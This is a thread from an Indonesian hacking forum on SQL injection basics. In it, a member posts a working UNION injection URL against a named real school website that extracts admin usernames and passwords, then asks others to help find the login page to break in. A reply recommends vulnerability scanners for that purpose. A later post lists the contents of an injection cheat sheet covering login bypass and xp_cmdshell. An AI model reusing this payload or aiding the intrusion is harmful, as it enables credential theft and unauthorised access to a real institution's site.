TEknIk MEndasar Sql Injection Season 1
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
- oki_machine
- Posts: 55
- Joined: Sun Feb 08, 2009 10:09 pm
- Location: root@oki_machine-oki # _
- Contact:
Re: TEknIk MEndasar Sql Injection Season 1
numpang corat coret di siani ya om
daripada bikin tpik baru malah nyampah
belum nemu'n halaman loginnya
udah tak ubek2 gak nemu'n juga
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
daripada bikin tpik baru malah nyampah
Code: Select all
http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
udah tak ubek2 gak nemu'n juga
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
.::[tresno jalaran saking kulino]::.
.::[nek wes kullino]::.
.::[karepmu]::.
-
- Posts: 1
- Joined: Mon Sep 08, 2008 3:38 am
- Location: samarinda, KALTIMfree
- Contact:
Re: TEknIk MEndasar Sql Injection Season 1
maknyos tuttsnya
Re: TEknIk MEndasar Sql Injection Season 1
Coba pake nikto atau acunetix bro cara cari login pagenya...vodork wrote:numpang corat coret di siani ya om
daripada bikin tpik baru malah nyampah
belum nemu'n halaman loginnyaCode: Select all
http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
udah tak ubek2 gak nemu'n juga
ada yang bisa?
mohon bimbinganya....
aku masih newbie...
thax b4...
Re: TEknIk MEndasar Sql Injection Season 1
Ok ok'
thx langsung menuju sasaran
thx langsung menuju sasaran
.::[tresno jalaran saking kulino]::.
.::[nek wes kullino]::.
.::[karepmu]::.
Re: TEknIk MEndasar Sql Injection Season 1
ane dah pake linux, jalanin perl-nya gimana bro? sori nubie
Learning Newbie
Re: TEknIk MEndasar Sql Injection Season 1
udah tak dunlud om tapi cara makenya rumit banget
maklum newbie
bisa tolong cari'n halaman loginx gak
maklum newbie
bisa tolong cari'n halaman loginx gak
.::[tresno jalaran saking kulino]::.
.::[nek wes kullino]::.
.::[karepmu]::.
Re: TEknIk MEndasar Sql Injection Season 1
wah aq masih bingung neh..nyimak aj dulu kali
- Gumux_1107
- Posts: 102
- Joined: Wed Dec 19, 2007 1:41 pm
- Location: Infront of My Computer
- Contact:
SQL Injection Cheat Sheet
Berhubung aku tadi dapet pas mau latian SQL inject (maklum, belom pernah slesei latian sql inject gara2 takut ), dapat ini Karna aku juga lagi ngg enak bikin tread baru yang malah nambah server tambah penuh, mendingan aku taruh disini aj
Url: http://ferruh.mavituna.com/sql-injectio ... sheet-oku/
Code: Select all
[size=150][b]Table Of Contents[/b][/size]
1. About SQL Injection Cheat Sheet
2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
1. Line Comments
* SQL Injection Attack Samples
2. Inline Comments
* Classical Inline Comment SQL Injection Attack Samples
* MySQL Version Detection Sample Attacks
3. Stacking Queries
* Language / Database Stacked Query Support Table
* About MySQL and PHP
* Stacked SQL Injection Attack Samples
4. If Statements
* MySQL If Statement
* SQL Server If Statement
* If Statement SQL Injection Attack Samples
5. Using Integers
6. String Operations
* String Concatenation
7. Strings without Quotes
* Hex based SQL Injection Samples
8. String Modification & Related
9. Union Injections
* UNION – Fixing Language Issues
10. Bypassing Login Screens
11. Enabling xp_cmdshell in SQL Server 2005
12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.
________________________________________________________________________________
SYNTAX ERROR
SYNTAX ERROR